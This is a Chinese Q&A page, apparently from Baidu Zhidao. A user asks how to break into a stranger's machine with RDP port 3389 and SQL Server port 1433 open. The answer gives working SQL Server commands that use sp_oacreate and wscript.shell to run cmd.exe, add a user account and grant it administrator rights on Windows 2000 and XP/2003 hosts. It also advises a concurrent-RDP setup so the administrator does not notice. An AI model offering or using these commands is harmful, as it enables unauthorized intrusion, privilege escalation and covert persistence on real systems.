我找到了一台开着3389,1433端口的机子

来源:百度知道 编辑:UC知道 时间:2024/06/06 06:33:38
我找到了一台开着3389,1433端口的机子。不知道该怎么入侵它,谁知道用什么软件能进入它CMD。或者能改它权限,有什么软件做到?远程桌面连的上。就是没密码。不知道怎么进它CMD。能进它CMD我就知道改怎么做。

你有没弱口令? 没有就别说了
有的话
下载个MSQL 进入后写上
2000servser系统:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 帐号 密码 /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 帐号 /add'

xp或2003server系统:

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 帐号 密码 /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 帐号 /add'

你就可以用用户名 进入了 当然, 在进入后你最好搞个双开的3389文件 不然就可能会被管理员发现